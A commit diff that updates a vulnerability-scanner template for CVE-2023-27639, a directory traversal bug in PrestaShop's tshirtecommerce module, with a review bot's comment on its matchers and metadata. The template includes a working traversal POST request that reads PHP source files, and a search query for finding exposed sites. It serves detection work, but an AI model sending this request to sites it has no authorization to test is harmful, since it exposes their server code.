updated req, matcher & metadata

patch-1
Ritik Chaddha 2024-01-20 02:35:28 +05:30 committed by GitHub
parent e7ed4d1cb0
commit 71f681c9a7
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 25 additions and 14 deletions


@ -1,32 +1,43 @@
id: CVE-2023-27639 id: CVE-2023-27639
info: info:
name: PrestaShop tshirtecommerce Directory Traversal name: PrestaShop TshirteCommerce - Directory Traversal
author: MaStErChO author: MaStErChO
severity: high severity: high
description: | description: |
"The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files." The Custom Product Designer (tshirtecommerce) module for PrestaShop allows HTTP requests to be forged using POST and GET parameters, enabling a remote attacker to perform directory traversal on the system and view the contents of code files.
reference: reference:
- https://www.cvedetails.com/cve/CVE-2023-27639/ - https://www.cvedetails.com/cve/CVE-2023-27639/
- https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html - https://security.friendsofpresta.org/module/2023/03/30/tshirtecommerce_cwe-22.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-27639
classification:
cve-id: CVE-2023-27639
metadata: metadata:
max-request: 1 max-request: 1
product: tshirtecommerce verified: true
framework: prestashop framework: prestashop
shodan-query: http.component:"prestashop" product: tshirtecommerce
tags: cve,cve2023,prestashop,lfi google-query: inurl:"/tshirtecommerce/"
tags: cve,cve2023,prestashop,tshirtecommerce,lfi
http: http:
- method: POST - raw:
path: - |
- "{{BaseURL}}/tshirtecommerce/ajax.php?type=svg" POST /tshirtecommerce/ajax.php?type=svg HTTP/1.1
body: "url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php" Host: {{Hostname}}
headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
url=.%2F..%2Fvendor%2Fjdorn%2Fsql-formatter%2Fexamples&file_name=examples.php
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "SqlFormatter Examples" - "SqlFormatter Examples"
- type: word - "SqlFormatter"
words: - "<?php"
- "?php" condition: and
- type: status
status:
- 200
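Review bot: in the new word matcher, `"SqlFormatter"` is redundant under `condition: and` because `"SqlFormatter Examples"` already contains it as a substring; keeping only `"SqlFormatter Examples"` and `"<?php"` gives the same match with less noise. The `classification` block added here carries only `cve-id`; the friendsofpresta reference in the same hunk names CWE-22, so `cwe-id: CWE-22` (and cvss fields once known) would make the metadata complete. The switch to a `raw` request and the added `status: 200` matcher otherwise look fine.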